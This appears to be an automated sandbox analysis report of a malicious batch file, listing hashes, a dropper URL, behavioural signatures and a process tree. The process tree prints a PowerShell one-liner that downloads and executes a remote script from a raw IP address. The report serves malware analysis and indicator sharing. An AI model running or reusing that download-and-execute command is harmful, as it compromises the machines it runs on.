Analysis
-
max time kernel
136s -
max time network
98s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
10-07-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
2211aeb68404653c6a42054308cf95e6.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
2211aeb68404653c6a42054308cf95e6.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
2211aeb68404653c6a42054308cf95e6.bat
-
Size
219B
-
MD5
68b33bb8cfe6e6cfbc8be50a90b3084b
-
SHA1
8b32c94506fe4bc67c38f6c1dbb955603dbc2ba4
-
SHA256
2311d76b97db37109d14a91f693f468810b9e530aa7f6a9d75dc827757054d6a
-
SHA512
6a328a1dc19ccddef2bb9aeb38fe874646b7789083360bb026435cb799e93b5a578713a53b45bb52a1f75327bc763054ebf2d2c53d2657dd20d88f89f8f84928
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2804 wrote to memory of 992 2804 cmd.exe powershell.exe PID 2804 wrote to memory of 992 2804 cmd.exe powershell.exe PID 2804 wrote to memory of 992 2804 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1800 992 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1800 WerFault.exe Token: SeBackupPrivilege 1800 WerFault.exe Token: SeDebugPrivilege 1800 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe 1800 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2211aeb68404653c6a42054308cf95e6.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6');Invoke-LJICDRBAHEGJ;Start-Sleep -s 10000"2⤵PID:992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1800
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/992-0-0x0000000000000000-mapping.dmp
-
memory/992-2-0x0000000000000000-mapping.dmp
-
memory/992-3-0x0000000000000000-mapping.dmp
-
memory/992-5-0x0000000000000000-mapping.dmp
-
memory/992-4-0x0000000000000000-mapping.dmp
-
memory/992-6-0x0000000000000000-mapping.dmp
-
memory/992-7-0x0000000000000000-mapping.dmp
-
memory/1800-1-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/1800-8-0x00000000056D0000-0x00000000056D1000-memory.dmpFilesize
4KB